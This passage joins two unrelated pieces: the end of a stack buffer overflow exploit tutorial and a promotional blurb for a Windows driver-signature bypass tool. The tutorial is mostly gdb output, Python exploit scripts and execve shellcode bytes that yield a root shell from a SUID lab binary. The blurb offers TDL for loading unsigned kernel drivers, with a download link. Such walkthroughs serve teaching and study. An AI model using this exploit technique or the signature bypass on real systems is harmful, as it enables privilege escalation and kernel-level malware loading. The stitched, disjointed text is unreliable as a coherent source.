   0x400609 <vuln+67>:  mov    eax,0x0
   0x40060e <vuln+72>:  leave
=> 0x40060f <vuln+73>:  ret
   0x400610 <main>: push   rbp
   0x400611 <main+1>:   mov    rbp,rsp
   0x400614 <main+4>:   sub    rsp,0x10
   0x400618 <main+8>:   mov    DWORD PTR [rbp-0x4],edi
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe508 ("A7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6"...)
0008| 0x7fffffffe510 ("AA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%"...)
0016| 0x7fffffffe518 ("jAA9AAOAAkAAPAAlAAQAAmAARAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA"...)
0024| 0x7fffffffe520 ("AkAAPAAlAAQAAmAARAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%j"...)
0032| 0x7fffffffe528 ("AAQAAmAARAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%"...)
0040| 0x7fffffffe530 ("RAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA"...)
0048| 0x7fffffffe538 ("AoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%R"...)
0056| 0x7fffffffe540 ("AAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%nA%SA%"...)
[------------------------------------------------------------------------------]

We can clearly see our cyclic pattern on the stack. Let’s find the offset:

gdb-peda$ x/wx $rsp
0x7fffffffe508: 0x41413741

gdb-peda$ pattern_offset 0x41413741
1094793025 found at offset: 104

So RIP is at offset 104. Let’s update our exploit and see if we can overwrite RIP this time:

#!/usr/bin/env python
from struct import *

buf = ""
buf += "A"*104                      # offset to RIP
buf += pack("<Q", 0x424242424242)   # overwrite RIP with 0x0000424242424242
buf += "C"*290                      # padding to keep payload length at 400 bytes

f = open("in.txt", "w")
f.write(buf)

Run it to create an updated in.txt file, and then redirect it into the program within gdb:

gdb-peda$ r < in.txt
Try to exec /bin/sh
Read 400 bytes. buf is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�
No shell for you :(

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x0
RCX: 0x7ffff7b015a0 (<__write_nocancel+7>:  cmp    rax,0xfffffffffffff001)
RDX: 0x7ffff7dd5a00 --> 0x0
RSI: 0x7ffff7ff5000 ("No shell for you :(\nis ", 'A' <repeats 92 times>"\220, \001\n")
RDI: 0x1
RBP: 0x4141414141414141 ('AAAAAAAA')
RSP: 0x7fffffffe510 ('C' <repeats 200 times>...)
RIP: 0x424242424242 ('BBBBBB')
R8 : 0x283a20756f792072 ('r you :(')
R9 : 0x4141414141414141 ('AAAAAAAA')
R10: 0x7fffffffe260 --> 0x0
R11: 0x246
R12: 0x4004d0 (<_start>:    xor    ebp,ebp)
R13: 0x7fffffffe600 ('C' <repeats 48 times>, "|\350\377\377\377\177")
R14: 0x0
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x424242424242
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe510 ('C' <repeats 200 times>...)
0008| 0x7fffffffe518 ('C' <repeats 200 times>...)
0016| 0x7fffffffe520 ('C' <repeats 200 times>...)
0024| 0x7fffffffe528 ('C' <repeats 200 times>...)
0032| 0x7fffffffe530 ('C' <repeats 200 times>...)
0040| 0x7fffffffe538 ('C' <repeats 200 times>...)
0048| 0x7fffffffe540 ('C' <repeats 200 times>...)
0056| 0x7fffffffe548 ('C' <repeats 200 times>...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0000424242424242 in ?? ()

Excellent, we’ve gained control over RIP. Since this program is compiled without NX or stack canaries, we can write our shellcode directly on the stack and return to it. Let’s go ahead and finish it. I’ll be using a 27-byte shellcode that executes execve(“/bin/sh”) found here.

We’ll store the shellcode on the stack via an environment variable and find its address on the stack using getenvaddr:

koji@pwnbox:~/classic$ export PWN=`python -c 'print "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"'`

koji@pwnbox:~/classic$ ~/getenvaddr PWN ./classic
PWN will be at 0x7fffffffeefa

We’ll update our exploit to return to our shellcode at 0x7fffffffeefa:

#!/usr/bin/env python
from struct import *

buf = ""
buf += "A"*104
buf += pack("<Q", 0x7fffffffeefa)

f = open("in.txt", "w")
f.write(buf)

Make sure to change the ownership and permission of classic to SUID root so we can get our root shell:

koji@pwnbox:~/classic$ sudo chown root classic
koji@pwnbox:~/classic$ sudo chmod 4755 classic

And finally, we’ll update in.txt and pipe our payload into classic:

koji@pwnbox:~/classic$ python ./sploit.py
koji@pwnbox:~/classic$ (cat in.txt ; cat) | ./classic
Try to exec /bin/sh
Read 112 bytes. buf is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAp
No shell for you :(
whoami
root

We’ve got a root shell, so our exploit worked. The main gotcha here was that we needed to be mindful of the maximum address size, otherwise we wouldn’t have been able to gain control of RIP. This concludes part 1 of the tutorial.

Part 1 was pretty easy, so for part 2 we’ll be using the same binary, only this time it will be compiled with NX. This will prevent us from executing instructions on the stack, so we’ll be looking at using ret2libc to get a root shell.

A Tool To Bypass Windows x64 Driver Signature Enforcement

TDL (Turla Driver Loader) For Bypassing Windows x64 Signature Enforcement

Definition: TDL Driver loader allows bypassing Windows x64 Driver Signature Enforcement.

What are the system requirements and limitations?

It can run on OS x64 Windows 7/8/8.1/10.
As Vista is obsolete so, TDL doesn’t support Vista it only designed for x64 Windows.
Privilege of administrator is required.
Loaded drivers MUST BE specially designed to run as «driverless».
There is No SEH support.
There is also No driver unloading.
Automatically Only ntoskrnl import resolved, else everything is up to you.
It also provides Dummy driver examples.


Differentiate DSEFix and TDL:

As both DSEFix and TDL uses advantages of driver exploit but they have entirely different way of using it.

Benefits of DSEFix: 

It manipulates kernel variable called g_CiEnabled (Vista/7, ntoskrnl.exe) and/or g_CiOptions (8+. CI.DLL).
DSEFix is simple- you need only to turn DSE it off — load your driver nothing else required.
DSEFix is a potential BSOD-generator as it id subject to PatchGuard (KPP) protection.

Advantages of TDL:

It is friendly to PatchGuard as it doesn’t patch any kernel variables.
Shellcode which TDL used can be able to map driver to kernel mode without windows loader.
Non-invasive bypass od DSE is the main advantage of TDL.

There are some disadvantages too:

To run as «driverless» Your driver must be specially created.
Driver should exist in kernel mode as executable code buffer
You can load multiple drivers, if they are not conflicting each other.

Build

TDL contains full source code. You need Microsoft Visual Studio 2015 U1 and later versions if you want to build it. And same as for driver builds there should be Microsoft Windows Driver Kit 8.1.

Download Link: Click Here